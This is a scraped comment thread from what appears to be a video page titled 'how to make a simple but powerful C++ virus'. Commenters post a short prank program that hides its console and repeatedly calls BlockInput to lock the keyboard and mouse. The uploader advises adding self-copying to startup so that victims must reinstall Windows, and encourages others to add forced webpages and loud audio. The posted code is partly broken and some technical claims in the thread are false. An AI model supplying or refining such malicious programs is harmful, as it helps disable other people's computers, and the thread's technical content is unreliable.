how to make a simple but powerful C++ virus
Loading...
6,857
Loading...
Uploader Comments (hima2013)
see all
All Comments (46)
-
Worst virus ever, to stop it all you have to do is hit ctrl alt delete and it auto overrides the BlockInput
-
@TheMonsterHacker Or if you had any sense you would compile as a GUI program, but with no Form. That way you have no console without any derp code.
-
the code:
#include windows.h
int main()
{ FreeConsole(); while(1) { BlockInput(true) }
}
-
@MightyTightiesэй, я знаю больше, чем ты, сука
-
i tried this and it didnt work and yes i did click on it
-
I dont know why but when im typing BlockInput(true); It wont Work!! :((
-
This won't work on Vista or Windows 7 unless you right click it and run it as Administrator.
-
I could stay.. on the war!
-
@acelious compile it
-
@GarrysSketch yes thats very possible
Loading...
is there a way you could make it display a webpage aswell as disable the keyboard and mouse? and if possible, unmute speakers or turn them up t ofull volume aswell as those other things?
GarrysSketch 5 months ago
@GarrysSketch : I know what are thinking of .. All of these things are possible to do, search for each one and you shall find them ... I'll be here if you need any thing
hima2013 5 months ago
what compiler are you using? i use Dev C++, and it's not working on it. do i have to download windows.h from somewhere?
ajhrockerboy6 5 months ago
@ajhrockerboy6 : i'm using the compiler embedded in MS visual studio , I think it's delphi .. I don't know for sure ... and for the .h , you don't have to download it , it's already on every copy of windows
hima2013 5 months ago
Actually I don't understand you , I'm calling the free console function to hide the cmd window. Why should I cal the show window instead ?
hima2013 6 months ago
@ Deglaze123 : the only way is to restart your system , and this is a week point in this virus , to make it more powerful . when typing the code , make the virus copies it self to the start up programs , thus the only way to re activate the keyboard and the mouse in that system is to re-install the operating system "MS Windows" of course.
hima2013 1 year ago